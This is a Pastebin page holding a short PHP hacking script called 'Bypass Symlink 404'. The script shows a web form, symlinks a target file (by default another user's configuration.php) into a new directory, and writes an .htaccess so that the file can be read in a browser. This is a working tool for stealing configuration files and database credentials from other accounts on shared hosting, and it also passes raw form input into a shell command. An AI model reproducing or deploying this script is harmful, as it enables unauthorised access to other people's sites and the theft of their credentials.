AZZATSSINS_CYBERSERK

Bypass Symlink 404

Jun 15th, 2017
289
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.50 KB | None | 0 0
  1. <?php /*SYM404 BY AZZATSSINS*/ @error_reporting(0);@ini_set('display_errors', 0); echo '<center><form method="post"><br>File Target : <input name="fl" value="/home/user/public_html/configuration.php"> <input name="anu" type="submit" value="SYM"></form><br>';if($_POST['anu']){
  2. rmdir("sl");system("mkdir sl");system("ln -s ".$_POST['fl']." sl/x.txt");
  3. $azxs="Options Indexes FollowSymLinks
  4. ReadmeName x.txt";
  5.  
  6. fwrite(fopen("sl/.htaccess", "w"),$azxs);
  7. echo'<a href=sl>CECK</a>';
  8. }
Add Comment
Please, Sign In to add comment